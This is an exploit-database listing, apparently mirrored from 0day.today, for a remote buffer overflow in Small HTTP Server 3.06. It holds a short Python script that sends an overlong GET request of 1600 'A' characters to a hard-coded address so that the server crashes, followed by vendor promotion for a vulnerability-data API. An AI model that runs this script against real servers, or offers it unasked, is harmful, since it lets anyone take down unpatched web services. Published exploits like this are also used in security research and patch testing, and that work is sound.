Lucene search
K

Small HTTP Server 3.06 Remote Buffer Overflow Exploit

🗓️ 07 Apr 2022 00:00:00Reported by Yehia ElghalyType 
zdt
 zdt
🔗 0day.today👁 222 Views

Small HTTP Server 3.06 Remote Buffer Overflow Exploit by Yehia Elghal

Code
# Exploit Title: Small HTTP Server Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Vendor Homepage: http://smallsrv.com/
# Software Link : http://smallsrv.com/shttps_mgi.exe
# Tested Version: 3.06
# Vulnerability Type:  Buffer Overflow Remote
# Tested on OS: Windows XP SP3 -  Windows 7 Professional x86 SP1 

# Description: Small HTTP Server 3.06 Long GET Remote Buffer Overflow


#!/usr/bin/env python

from requests.exceptions import ConnectionError
from requests.compat import urljoin, quote_plus
import requests as req

try:
  url = "http://192.168.1.99"
  term = "A" * 1600
  evilb = urljoin(url, quote_plus(term))
  resp = req.request(method='GET', url=evilb)
  print(resp.text)
except ConnectionError as e:
  print "Crashed!!"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Apr 2022 00:00Current
7.1High risk
Vulners AI Score7.1
222